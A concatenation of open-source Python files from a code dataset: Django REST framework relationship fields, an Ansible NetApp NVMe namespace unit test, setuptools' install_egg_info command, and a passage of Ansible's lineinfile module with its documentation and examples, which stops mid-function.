many_widget = widgets.SelectMultiple
form_field_class = forms.ChoiceField
many_form_field_class = forms.MultipleChoiceField
null_values = (None, '', 'None')
cache_choices = False
empty_label = None
read_only = True
many = False
def __init__(self, *args, **kwargs):
# 'null' is to be deprecated in favor of 'required'
if 'null' in kwargs:
warnings.warn('The `null` keyword argument is deprecated. '
'Use the `required` keyword argument instead.',
DeprecationWarning, stacklevel=2)
kwargs['required'] = not kwargs.pop('null')
queryset = kwargs.pop('queryset', None)
self.many = kwargs.pop('many', self.many)
if self.many:
self.widget = self.many_widget
self.form_field_class = self.many_form_field_class
kwargs['read_only'] = kwargs.pop('read_only', self.read_only)
super(RelatedField, self).__init__(*args, **kwargs)
if not self.required:
self.empty_label = BLANK_CHOICE_DASH[0][1]
self.queryset = queryset
def initialize(self, parent, field_name):
super(RelatedField, self).initialize(parent, field_name)
if self.queryset is None and not self.read_only:
manager = getattr(self.parent.opts.model, self.source or field_name)
if hasattr(manager, 'related'): # Forward
self.queryset = manager.related.model._default_manager.all()
else: # Reverse
self.queryset = manager.field.rel.to._default_manager.all()
### We need this stuff to make form choices work...
def prepare_value(self, obj):
return self.to_native(obj)
def label_from_instance(self, obj):
"""
Return a readable representation for use with eg. select widgets.
"""
desc = smart_text(obj)
ident = smart_text(self.to_native(obj))
if desc == ident:
return desc
return "%s - %s" % (desc, ident)
def _get_queryset(self):
return self._queryset
def _set_queryset(self, queryset):
self._queryset = queryset
self.widget.choices = self.choices
queryset = property(_get_queryset, _set_queryset)
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh ModelChoiceIterator that has not been
# consumed. Note that we're instantiating a new ModelChoiceIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return ModelChoiceIterator(self)
def _set_choices(self, value):
# Setting choices also sets the choices on the widget.
# choices can be any iterable, but we call list() on it because
# it will be consumed more than once.
self._choices = self.widget.choices = list(value)
choices = property(_get_choices, _set_choices)
### Default value handling
def get_default_value(self):
default = super(RelatedField, self).get_default_value()
if self.many and default is None:
return []
return default
### Regular serializer stuff...
def field_to_native(self, obj, field_name):
try:
if self.source == '*':
return self.to_native(obj)
source = self.source or field_name
value = obj
for component in source.split('.'):
if value is None:
break
value = get_component(value, component)
except ObjectDoesNotExist:
return None
if value is None:
return None
if self.many:
if is_simple_callable(getattr(value, 'all', None)):
return [self.to_native(item) for item in value.all()]
else:
# Also support non-queryset iterables.
# This allows us to also support plain lists of related items.
return [self.to_native(item) for item in value]
return self.to_native(value)
def field_from_native(self, data, files, field_name, into):
if self.read_only:
return
try:
if self.many:
try:
# Form data
value = data.getlist(field_name)
if value == [''] or value == []:
raise KeyError
except AttributeError:
# Non-form data
value = data[field_name]
else:
value = data[field_name]
except KeyError:
if self.partial:
return
value = self.get_default_value()
if value in self.null_values:
if self.required:
raise ValidationError(self.error_messages['required'])
into[(self.source or field_name)] = None
elif self.many:
into[(self.source or field_name)] = [self.from_native(item) for item in value]
else:
into[(self.source or field_name)] = self.from_native(value)
### PrimaryKey relationships
class PrimaryKeyRelatedField(RelatedField):
"""
Represents a relationship as a pk value.
"""
read_only = False
default_error_messages = {
'does_not_exist': _("Invalid pk '%s' - object does not exist."),
'incorrect_type': _('Incorrect type. Expected pk value, received %s.'),
}
# TODO: Remove these field hacks...
def prepare_value(self, obj):
return self.to_native(obj.pk)
def label_from_instance(self, obj):
"""
Return a readable representation for use with eg. select widgets.
"""
desc = smart_text(obj)
ident = smart_text(self.to_native(obj.pk))
if desc == ident:
return desc
return "%s - %s" % (desc, ident)
# TODO: Possibly change this to just take `obj`, through prob less performant
def to_native(self, pk):
return pk
def from_native(self, data):
if self.queryset is None:
raise Exception('Writable related fields must include a `queryset` argument')
try:
return self.queryset.get(pk=data)
except ObjectDoesNotExist:
msg = self.error_messages['does_not_exist'] % smart_text(data)
raise ValidationError(msg)
except (TypeError, ValueError):
received = type(data).__name__
msg = self.error_messages['incorrect_type'] % received
raise ValidationError(msg)
def field_to_native(self, obj, field_name):
if self.many:
# To-many relationship
queryset = None
if not self.source:
# Prefer obj.serializable_value for performance reasons
try:
queryset = obj.serializable_value(field_name)
except AttributeError:
pass
if queryset is None:
# RelatedManager (reverse relationship)
source = self.source or field_name
queryset = obj
for component in source.split('.'):
if queryset is None:
return []
queryset = get_component(queryset, component)
# Forward relationship
if is_simple_callable(getattr(queryset, 'all', None)):
return [self.to_native(item.pk) for item in queryset.all()]
else:
# Also support non-queryset iterables.
# This allows us to also support plain lists of related items.
return [self.to_native(item.pk) for item in queryset]
# To-one relationship
try:
# Prefer obj.serializable_value for performance reasons
pk = obj.serializable_value(self.source or field_name)
except AttributeError:
# RelatedObject (reverse relationship)
try:
pk = getattr(obj, self.source or field_name).pk
except (ObjectDoesNotExist, AttributeError):
return None
# Forward relationship
return self.to_native(pk)
### Slug relationships
class SlugRelatedField(RelatedField):
"""
Represents a relationship using a unique field on the target.
"""
read_only = False
default_error_messages = {
'does_not_exist': _("Object with %s=%s does not exist."),
'invalid': _('Invalid value.'),
}
def __init__(self, *args, **kwargs):
self.slug_field = kwargs.pop('slug_field', None)
assert self.slug_field, 'slug_field is required'
super(SlugRelatedField, self).__init__(*args, **kwargs)
def to_native(self, obj):
return getattr(obj, self.slug_field)
def from_native(self, data):
if self.queryset is None:
raise Exception('Writable related fields must include a `queryset` argument')
try:
return self.queryset.get(**{self.slug_field: data})
except ObjectDoesNotExist:
raise ValidationError(self.error_messages['does_not_exist'] %
(self.slug_field, smart_text(data)))
except (TypeError, ValueError):
msg = self.error_messages['invalid']
raise ValidationError(msg)
### Hyperlinked relationships
class HyperlinkedRelatedField(RelatedField):
"""
Represents a relationship using hyperlinking.
"""
read_only = False
lookup_field = 'pk'
default_error_messages = {
'no_match': _('Invalid hyperlink - No URL match'),
'incorrect_match': _('Invalid hyperlink - Incorrect URL match'),
'configuration_error': _('Invalid hyperlink due to configuration error'),
'does_not_exist': _("Invalid hyperlink - object does not exist."),
'incorrect_type': _('Incorrect type. Expected url string, received %s.'),
}
# These are all pending deprecation
pk_url_kwarg = 'pk'
slug_field = 'slug'
slug_url_kwarg = None # Defaults to same as `slug_field` unless overridden
def __init__(self, *args, **kwargs):
try:
self.view_name = kwargs.pop('view_name')
except KeyError:
raise ValueError("Hyperlinked field requires 'view_name' kwarg")
self.lookup_field = kwargs.pop('lookup_field', self.lookup_field)
self.format = kwargs.pop('format', None)
# These are pending deprecation
if 'pk_url_kwarg' in kwargs:
msg = 'pk_url_kwarg is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
if 'slug_url_kwarg' in kwargs:
msg = 'slug_url_kwarg is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
if 'slug_field' in kwargs:
msg = 'slug_field is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
self.pk_url_kwarg = kwargs.pop('pk_url_kwarg', self.pk_url_kwarg)
self.slug_field = kwargs.pop('slug_field', self.slug_field)
default_slug_kwarg = self.slug_url_kwarg or self.slug_field
self.slug_url_kwarg = kwargs.pop('slug_url_kwarg', default_slug_kwarg)
super(HyperlinkedRelatedField, self).__init__(*args, **kwargs)
def get_url(self, obj, view_name, request, format):
"""
Given an object, return the URL that hyperlinks to the object.
May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
attributes are not configured to correctly match the URL conf.
"""
lookup_field = getattr(obj, self.lookup_field)
kwargs = {self.lookup_field: lookup_field}
try:
return reverse(view_name, kwargs=kwargs, request=request, format=format)
except NoReverseMatch:
pass
if self.pk_url_kwarg != 'pk':
# Only try pk if it has been explicitly set.
# Otherwise, the default `lookup_field = 'pk'` has us covered.
pk = obj.pk
kwargs = {self.pk_url_kwarg: pk}
try:
return reverse(view_name, kwargs=kwargs, request=request, format=format)
except NoReverseMatch:
pass
slug = getattr(obj, self.slug_field, None)
if slug is not None:
# Only try slug if it corresponds to an attribute on the object.
kwargs = {self.slug_url_kwarg: slug}
try:
ret = reverse(view_name, kwargs=kwargs, request=request, format=format)
if self.slug_field == 'slug' and self.slug_url_kwarg == 'slug':
# If the lookup succeeds using the default slug params,
# then `slug_field` is being used implicitly, and we
# we need to warn about the pending deprecation.
msg = 'Implicit slug field hyperlinked fields are pending deprecation.' \
'You should set `lookup_field=slug` on the HyperlinkedRelatedField.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
return ret
except NoReverseMatch:
pass
raise NoReverseMatch()
def get_object(self, queryset, view_name, view_args, view_kwargs):
"""
Return the object corresponding to a matched URL.
Takes the matched URL conf arguments, and the queryset, and should
return an object instance, or raise an `ObjectDoesNotExist` exception.
"""
lookup = view_kwargs.get(self.lookup_field, None)
pk = view_kwargs.get(self.pk_url_kwarg, None)
slug = view_kwargs.get(self.slug_url_kwarg, None)
if lookup is not None:
filter_kwargs = {self.lookup_field: lookup}
elif pk is not None:
filter_kwargs = {'pk': pk}
elif slug is not None:
filter_kwargs = {self.slug_field: slug}
else:
raise ObjectDoesNotExist()
return queryset.get(**filter_kwargs)
def to_native(self, obj):
view_name = self.view_name
request = self.context.get('request', None)
format = self.format or self.context.get('format', None)
if request is None:
msg = (
"Using `HyperlinkedRelatedField` without including the request "
"in the serializer context is deprecated. "
"Add `context={'request': request}` when instantiating "
"the serializer."
)
warnings.warn(msg, DeprecationWarning, stacklevel=4)
# If the object has not yet been saved then we cannot hyperlink to it.
if getattr(obj, 'pk', None) is None:
return
# Return the hyperlink, or error if incorrectly configured.
try:
return self.get_url(obj, view_name, request, format)
except NoReverseMatch:
msg = (
'Could not resolve URL for hyperlinked relationship using '
'view name "%s". You may have failed to include the related '
'model in your API, or incorrectly configured the '
'`lookup_field` attribute on this field.'
)
raise Exception(msg % view_name)
def from_native(self, value):
# Convert URL -> model instance pk
# TODO: Use values_list
queryset = self.queryset
if queryset is None:
raise Exception('Writable related fields must include a `queryset` argument')
try:
http_prefix = value.startswith(('http:', 'https:'))
except AttributeError:
msg = self.error_messages['incorrect_type']
raise ValidationError(msg % type(value).__name__)
if http_prefix:
# If needed convert absolute URLs to relative path
value = urlparse.urlparse(value).path
prefix = get_script_prefix()
if value.startswith(prefix):
value = '/' + value[len(prefix):]
try:
match = resolve(value)
except Exception:
raise ValidationError(self.error_messages['no_match'])
if match.view_name != self.view_name:
raise ValidationError(self.error_messages['incorrect_match'])
try:
return self.get_object(queryset, match.view_name,
match.args, match.kwargs)
except (ObjectDoesNotExist, TypeError, ValueError):
raise ValidationError(self.error_messages['does_not_exist'])
class HyperlinkedIdentityField(Field):
"""
Represents the instance, or a property on the instance, using hyperlinking.
"""
lookup_field = 'pk'
read_only = True
# These are all pending deprecation
pk_url_kwarg = 'pk'
slug_field = 'slug'
slug_url_kwarg = None # Defaults to same as `slug_field` unless overridden
def __init__(self, *args, **kwargs):
try:
self.view_name = kwargs.pop('view_name')
except KeyError:
msg = "HyperlinkedIdentityField requires 'view_name' argument"
raise ValueError(msg)
self.format = kwargs.pop('format', None)
lookup_field = kwargs.pop('lookup_field', None)
self.lookup_field = lookup_field or self.lookup_field
# These are pending deprecation
if 'pk_url_kwarg' in kwargs:
msg = 'pk_url_kwarg is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
if 'slug_url_kwarg' in kwargs:
msg = 'slug_url_kwarg is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
if 'slug_field' in kwargs:
msg = 'slug_field is pending deprecation. Use lookup_field instead.'
warnings.warn(msg, PendingDeprecationWarning, stacklevel=2)
self.slug_field = kwargs.pop('slug_field', self.slug_field)
default_slug_kwarg = self.slug_url_kwarg or self.slug_field
self.pk_url_kwarg = kwargs.pop('pk_url_kwarg', self.pk_url_kwarg)
self.slug_url_kwarg = kwargs.pop('slug_url_kwarg', default_slug_kwarg)
super(HyperlinkedIdentityField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
request = self.context.get('request', None)
format = self.context.get('format', None)
view_name = self.view_name
if request is None:
warnings.warn("Using `HyperlinkedIdentityField` without including the "
"request in the serializer context is deprecated. "
"Add `context={'request': request}` when instantiating the serializer.",
DeprecationWarning, stacklevel=4)
# By default use whatever format is given for the current context
# unless the target is a different type to the source.
#
# Eg. Consider a HyperlinkedIdentityField pointing from a json
# representation to an html property of that representation...
#
# '/snippets/1/' should link to '/snippets/1/highlight/'
# ...but...
# '/snippets/1/.json' should link to '/snippets/1/highlight/.html'
if format and self.format and self.format != format:
format = self.format
# Return the hyperlink, or error if incorrectly configured.
try:
return self.get_url(obj, view_name, request, format)
except NoReverseMatch:
msg = (
'Could not resolve URL for hyperlinked relationship using '
'view name "%s". You may have failed to include the related '
'model in your API, or incorrectly configured the '
'`lookup_field` attribute on this field.'
)
raise Exception(msg % view_name)
def get_url(self, obj, view_name, request, format):
"""
Given an object, return the URL that hyperlinks to the object.
May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
attributes are not configured to correctly match the URL conf.
"""
lookup_field = getattr(obj, self.lookup_field, None)
kwargs = {self.lookup_field: lookup_field}
# Handle unsaved object case
if lookup_field is None:
return None
try:
return reverse(view_name, kwargs=kwargs, request=request, format=format)
except NoReverseMatch:
pass
if self.pk_url_kwarg != 'pk':
# Only try pk lookup if it has been explicitly set.
# Otherwise, the default `lookup_field = 'pk'` has us covered.
kwargs = {self.pk_url_kwarg: obj.pk}
try:
return reverse(view_name, kwargs=kwargs, request=request, format=format)
except NoReverseMatch:
pass
slug = getattr(obj, self.slug_field, None)
if slug:
# Only use slug lookup if a slug field exists on the model
kwargs = {self.slug_url_kwarg: slug}
try:
return reverse(view_name, kwargs=kwargs, request=request, format=format)
except NoReverseMatch:
pass
raise NoReverseMatch()
### Old-style many classes for backwards compat
class ManyRelatedField(RelatedField):
def __init__(self, *args, **kwargs):
warnings.warn('`ManyRelatedField()` is deprecated. '
'Use `RelatedField(many=True)` instead.',
DeprecationWarning, stacklevel=2)
kwargs['many'] = True
super(ManyRelatedField, self).__init__(*args, **kwargs)
class ManyPrimaryKeyRelatedField(PrimaryKeyRelatedField):
def __init__(self, *args, **kwargs):
warnings.warn('`ManyPrimaryKeyRelatedField()` is deprecated. '
'Use `PrimaryKeyRelatedField(many=True)` instead.',
DeprecationWarning, stacklevel=2)
kwargs['many'] = True
super(ManyPrimaryKeyRelatedField, self).__init__(*args, **kwargs)
class ManySlugRelatedField(SlugRelatedField):
def __init__(self, *args, **kwargs):
warnings.warn('`ManySlugRelatedField()` is deprecated. '
'Use `SlugRelatedField(many=True)` instead.',
DeprecationWarning, stacklevel=2)
kwargs['many'] = True
super(ManySlugRelatedField, self).__init__(*args, **kwargs)
class ManyHyperlinkedRelatedField(HyperlinkedRelatedField):
def __init__(self, *args, **kwargs):
warnings.warn('`ManyHyperlinkedRelatedField()` is deprecated. '
'Use `HyperlinkedRelatedField(many=True)` instead.',
DeprecationWarning, stacklevel=2)
kwargs['many'] = True
super(ManyHyperlinkedRelatedField, self).__init__(*args, **kwargs)
| apache-2.0 |
andmos/ansible | test/units/modules/storage/netapp/test_na_ontap_nvme_namespace.py | 48 | 7361 | # (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit tests ONTAP Ansible module: na_ontap_nvme_namespace'''
from __future__ import print_function
import json
import pytest
from units.compat import unittest
from units.compat.mock import patch
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
import ansible.module_utils.netapp as netapp_utils
from ansible.modules.storage.netapp.na_ontap_nvme_namespace \
import NetAppONTAPNVMENamespace as my_module
if not netapp_utils.has_netapp_lib():
pytestmark = pytest.mark.skip('skipping as missing required netapp_lib')
def set_module_args(args):
"""prepare arguments so that they will be picked up during module creation"""
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access
class AnsibleExitJson(Exception):
"""Exception class to be raised by module.exit_json and caught by the test case"""
pass
class AnsibleFailJson(Exception):
"""Exception class to be raised by module.fail_json and caught by the test case"""
pass
def exit_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over exit_json; package return data into an exception"""
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
def fail_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over fail_json; package return data into an exception"""
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
class MockONTAPConnection(object):
''' mock server connection to ONTAP host '''
def __init__(self, kind=None):
''' save arguments '''
self.type = kind
self.xml_in = None
self.xml_out = None
def invoke_successfully(self, xml, enable_tunneling): # pylint: disable=unused-argument
''' mock invoke_successfully returning xml data '''
self.xml_in = xml
if self.type == 'namespace':
xml = self.build_namespace_info()
elif self.type == 'quota_fail':
raise netapp_utils.zapi.NaApiError(code='TEST', message="This exception is from the unit test")
self.xml_out = xml
return xml
@staticmethod
def build_namespace_info():
''' build xml data for namespace-info '''
xml = netapp_utils.zapi.NaElement('xml')
data = {'num-records': 2,
'attributes-list': [{'nvme-namespace-info': {'path': 'abcd/vol'}},
{'nvme-namespace-info': {'path': 'xyz/vol'}}]}
xml.translate_struct(data)
return xml
class TestMyModule(unittest.TestCase):
''' a group of related Unit Tests '''
def setUp(self):
self.mock_module_helper = patch.multiple(basic.AnsibleModule,
exit_json=exit_json,
fail_json=fail_json)
self.mock_module_helper.start()
self.addCleanup(self.mock_module_helper.stop)
self.server = MockONTAPConnection()
self.onbox = False
def set_default_args(self):
if self.onbox:
hostname = '10.193.75.3'
username = 'admin'
password = 'netapp1!'
vserver = 'ansible'
ostype = 'linux'
path = 'abcd/vol'
size = 20
else:
hostname = 'hostname'
username = 'username'
password = 'password'
vserver = 'vserver'
ostype = 'linux'
path = 'abcd/vol'
size = 20
return dict({
'hostname': hostname,
'username': username,
'password': password,
'ostype': ostype,
'vserver': vserver,
'path': path,
'size': size
})
def test_module_fail_when_required_args_missing(self):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleFailJson) as exc:
set_module_args({})
my_module()
print('Info: %s' % exc.value.args[0]['msg'])
def test_ensure_get_called(self):
''' test get_namespace() for non-existent namespace'''
set_module_args(self.set_default_args())
my_obj = my_module()
my_obj.server = self.server
assert my_obj.get_namespace() is None
def test_ensure_get_called_existing(self):
''' test get_namespace() for existing namespace'''
set_module_args(self.set_default_args())
my_obj = my_module()
my_obj.server = MockONTAPConnection(kind='namespace')
assert my_obj.get_namespace()
@patch('ansible.modules.storage.netapp.na_ontap_nvme_namespace.NetAppONTAPNVMENamespace.create_namespace')
def test_successful_create(self, create_namespace):
''' creating namespace and testing idempotency '''
set_module_args(self.set_default_args())
my_obj = my_module()
if not self.onbox:
my_obj.server = self.server
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert exc.value.args[0]['changed']
create_namespace.assert_called_with()
# to reset na_helper from remembering the previous 'changed' value
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('namespace')
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert not exc.value.args[0]['changed']
@patch('ansible.modules.storage.netapp.na_ontap_nvme_namespace.NetAppONTAPNVMENamespace.delete_namespace')
def test_successful_delete(self, delete_namespace):
''' deleting namespace and testing idempotency '''
data = self.set_default_args()
data['state'] = 'absent'
set_module_args(data)
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('namespace')
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert exc.value.args[0]['changed']
delete_namespace.assert_called_with()
# to reset na_helper from remembering the previous 'changed' value
my_obj = my_module()
if not self.onbox:
my_obj.server = self.server
with pytest.raises(AnsibleExitJson) as exc:
my_obj.apply()
assert not exc.value.args[0]['changed']
def test_if_all_methods_catch_exception(self):
module_args = {}
module_args.update(self.set_default_args())
set_module_args(module_args)
my_obj = my_module()
if not self.onbox:
my_obj.server = MockONTAPConnection('quota_fail')
with pytest.raises(AnsibleFailJson) as exc:
my_obj.get_namespace()
assert 'Error fetching namespace info:' in exc.value.args[0]['msg']
with pytest.raises(AnsibleFailJson) as exc:
my_obj.create_namespace()
assert 'Error creating namespace for path' in exc.value.args[0]['msg']
with pytest.raises(AnsibleFailJson) as exc:
my_obj.delete_namespace()
assert 'Error deleting namespace for path' in exc.value.args[0]['msg']
| gpl-3.0 |
NoahFlowa/glowing-spoon | venv/lib/python2.7/site-packages/setuptools/command/install_egg_info.py | 412 | 2203 | from distutils import log, dir_util
import os
from setuptools import Command
from setuptools import namespaces
from setuptools.archive_util import unpack_archive
import pkg_resources
class install_egg_info(namespaces.Installer, Command):
"""Install an .egg-info directory for the package"""
description = "Install an .egg-info directory for the package"
user_options = [
('install-dir=', 'd', "directory to install to"),
]
def initialize_options(self):
self.install_dir = None
def finalize_options(self):
self.set_undefined_options('install_lib',
('install_dir', 'install_dir'))
ei_cmd = self.get_finalized_command("egg_info")
basename = pkg_resources.Distribution(
None, None, ei_cmd.egg_name, ei_cmd.egg_version
).egg_name() + '.egg-info'
self.source = ei_cmd.egg_info
self.target = os.path.join(self.install_dir, basename)
self.outputs = []
def run(self):
self.run_command('egg_info')
if os.path.isdir(self.target) and not os.path.islink(self.target):
dir_util.remove_tree(self.target, dry_run=self.dry_run)
elif os.path.exists(self.target):
self.execute(os.unlink, (self.target,), "Removing " + self.target)
if not self.dry_run:
pkg_resources.ensure_directory(self.target)
self.execute(
self.copytree, (), "Copying %s to %s" % (self.source, self.target)
)
self.install_namespaces()
def get_outputs(self):
return self.outputs
def copytree(self):
# Copy the .egg-info tree to site-packages
def skimmer(src, dst):
# filter out source-control directories; note that 'src' is always
# a '/'-separated path, regardless of platform. 'dst' is a
# platform-specific path.
for skip in '.svn/', 'CVS/':
if src.startswith(skip) or '/' + skip in src:
return None
self.outputs.append(dst)
log.debug("Copying %s to %s", src, dst)
return dst
unpack_archive(self.source, self.target, skimmer)
| apache-2.0 |
GheRivero/ansible | lib/ansible/modules/files/lineinfile.py | 4 | 17964 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Daniel Hokka Zakrisson <daniel@hozac.com>
# Copyright: (c) 2014, Ahti Kitsik <ak@ahtik.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: lineinfile
author:
- Daniel Hokka Zakrissoni (@dhozac)
- Ahti Kitsik (@ahtik)
extends_documentation_fragment:
- files
- validate
short_description: Manage lines in text files
description:
- This module ensures a particular line is in a file, or replace an
existing line using a back-referenced regular expression.
- This is primarily useful when you want to change a single line in
a file only. See the M(replace) module if you want to change
multiple, similar lines or check M(blockinfile) if you want to insert/update/remove a block of lines in a file.
For other cases, see the M(copy) or M(template) modules.
version_added: "0.7"
options:
path:
description:
- The file to modify.
- Before 2.3 this option was only usable as I(dest), I(destfile) and I(name).
aliases: [ dest, destfile, name ]
required: true
regexp:
description:
- The regular expression to look for in every line of the file. For
C(state=present), the pattern to replace if found. Only the last line
found will be replaced. For C(state=absent), the pattern of the line(s)
to remove. Uses Python regular expressions.
See U(http://docs.python.org/2/library/re.html).
version_added: '1.7'
state:
description:
- Whether the line should be there or not.
choices: [ absent, present ]
default: present
line:
description:
- Required for C(state=present). The line to insert/replace into the
file. If C(backrefs) is set, may contain backreferences that will get
expanded with the C(regexp) capture groups if the regexp matches.
backrefs:
description:
- Used with C(state=present). If set, C(line) can contain backreferences
(both positional and named) that will get populated if the C(regexp)
matches. This flag changes the operation of the module slightly;
C(insertbefore) and C(insertafter) will be ignored, and if the C(regexp)
doesn't match anywhere in the file, the file will be left unchanged.
If the C(regexp) does match, the last matching line will be replaced by
the expanded line parameter.
type: bool
default: 'no'
version_added: "1.1"
insertafter:
description:
- Used with C(state=present). If specified, the line will be inserted
after the last match of specified regular expression.
If the first match is required, use(firstmatch=yes).
A special value is available; C(EOF) for inserting the line at the
end of the file.
If specified regular expression has no matches, EOF will be used instead.
May not be used with C(backrefs).
choices: [ EOF, '*regex*' ]
default: EOF
insertbefore:
description:
- Used with C(state=present). If specified, the line will be inserted
before the last match of specified regular expression.
If the first match is required, use(firstmatch=yes).
A value is available; C(BOF) for inserting the line at
the beginning of the file.
If specified regular expression has no matches, the line will be
inserted at the end of the file. May not be used with C(backrefs).
choices: [ BOF, '*regex*' ]
version_added: "1.1"
create:
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. By default it will fail if the file
is missing.
type: bool
default: 'no'
backup:
description:
- Create a backup file including the timestamp information so you can
get the original file back if you somehow clobbered it incorrectly.
type: bool
default: 'no'
firstmatch:
description:
- Used with C(insertafter) or C(insertbefore). If set, C(insertafter) and C(inserbefore) find
a first line has regular expression matches.
type: bool
default: 'no'
version_added: "2.5"
others:
description:
- All arguments accepted by the M(file) module also work here.
notes:
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
"""
EXAMPLES = r"""
# Before 2.3, option 'dest', 'destfile' or 'name' was used instead of 'path'
- lineinfile:
path: /etc/selinux/config
regexp: '^SELINUX='
line: 'SELINUX=enforcing'
- lineinfile:
path: /etc/sudoers
state: absent
regexp: '^%wheel'
- lineinfile:
path: /etc/hosts
regexp: '^127\.0\.0\.1'
line: '127.0.0.1 localhost'
owner: root
group: root
mode: 0644
- lineinfile:
path: /etc/httpd/conf/httpd.conf
regexp: '^Listen '
insertafter: '^#Listen '
line: 'Listen 8080'
- lineinfile:
path: /etc/services
regexp: '^# port for http'
insertbefore: '^www.*80/tcp'
line: '# port for http by default'
# Add a line to a file if the file does not exist, without passing regexp
- lineinfile:
path: /tmp/testfile
line: '192.168.1.99 foo.lab.net foo'
create: yes
# Fully quoted because of the ': ' on the line. See the Gotchas in the YAML docs.
- lineinfile:
path: /etc/sudoers
state: present
regexp: '^%wheel\s'
line: '%wheel ALL=(ALL) NOPASSWD: ALL'
# Yaml requires escaping backslashes in double quotes but not in single quotes
- lineinfile:
path: /opt/jboss-as/bin/standalone.conf
regexp: '^(.*)Xms(\\d+)m(.*)$'
line: '\1Xms${xms}m\3'
backrefs: yes
# Validate the sudoers file before saving
- lineinfile:
path: /etc/sudoers
state: present
regexp: '^%ADMIN ALL='
line: '%ADMIN ALL=(ALL) NOPASSWD: ALL'
validate: '/usr/sbin/visudo -cf %s'
"""
import os
import re
import tempfile
# import module snippets
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import b
from ansible.module_utils._text import to_bytes, to_native
def write_changes(module, b_lines, dest):
tmpfd, tmpfile = tempfile.mkstemp()
f = os.fdopen(tmpfd, 'wb')
f.writelines(b_lines)
f.close()
validate = module.params.get('validate', None)
valid = not validate
if validate:
if "%s" not in validate:
module.fail_json(msg="validate must contain %%s: %s" % (validate))
(rc, out, err) = module.run_command(to_bytes(validate % tmpfile, errors='surrogate_or_strict'))
valid = rc == 0
if rc != 0:
module.fail_json(msg='failed to validate: '
'rc:%s error:%s' % (rc, err))
if valid:
module.atomic_move(tmpfile,
to_native(os.path.realpath(to_bytes(dest, errors='surrogate_or_strict')), errors='surrogate_or_strict'),
unsafe_writes=module.params['unsafe_writes'])
def check_file_attrs(module, changed, message, diff):
file_args = module.load_file_common_arguments(module.params)
if module.set_fs_attributes_if_different(file_args, False, diff=diff):
if changed:
message += " and "
changed = True
message += "ownership, perms or SE linux context changed"
return message, changed
def present(module, dest, regexp, line, insertafter, insertbefore, create,
backup, backrefs, firstmatch):
diff = {'before': '',
'after': '',
'before_header': '%s (content)' % dest,
'after_header': '%s (content)' % dest}
b_dest = to_bytes(dest, errors='surrogate_or_strict')
if not os.path.exists(b_dest):
if not create:
module.fail_json(rc=257, msg='Destination %s does not exist !' % dest)
b_destpath = os.path.dirname(b_dest)
if not os.path.exists(b_destpath) and not module.check_mode:
try:
os.makedirs(b_destpath)
except Exception as e:
module.fail_json(msg='Error creating %s Error code: %s Error description: %s' % (b_destpath, e[0], e[1]))
b_lines = []
else:
f = open(b_dest, 'rb')
b_lines = f.readlines()
f.close()
if module._diff:
diff['before'] = to_native(b('').join(b_lines))
if regexp is not None:
bre_m = re.compile(to_bytes(regexp, errors='surrogate_or_strict'))
if insertafter not in (None, 'BOF', 'EOF'):
bre_ins = re.compile(to_bytes(insertafter, errors='surrogate_or_strict'))
elif insertbefore not in (None, 'BOF'):
bre_ins = re.compile(to_bytes(insertbefore, errors='surrogate_or_strict'))
else:
bre_ins = None
# index[0] is the line num where regexp has been found
# index[1] is the line num where insertafter/inserbefore has been found
index = [-1, -1]
m = None
b_line = to_bytes(line, errors='surrogate_or_strict')
for lineno, b_cur_line in enumerate(b_lines):
if regexp is not None:
match_found = bre_m.search(b_cur_line)
else:
match_found = b_line == b_cur_line.rstrip(b('\r\n'))
if match_found:
index[0] = lineno
m = match_found
elif bre_ins is not None and bre_ins.search(b_cur_line):
if insertafter:
# + 1 for the next line
index[1] = lineno + 1
if firstmatch:
break
if insertbefore:
# index[1] for the previous line
index[1] = lineno
if firstmatch:
break
msg = ''
changed = False
# Regexp matched a line in the file
b_linesep = to_bytes(os.linesep, errors='surrogate_or_strict')
if index[0] != -1:
if backrefs:
b_new_line = m.expand(b_line)
else:
# Don't do backref expansion if not asked.
b_new_line = b_line
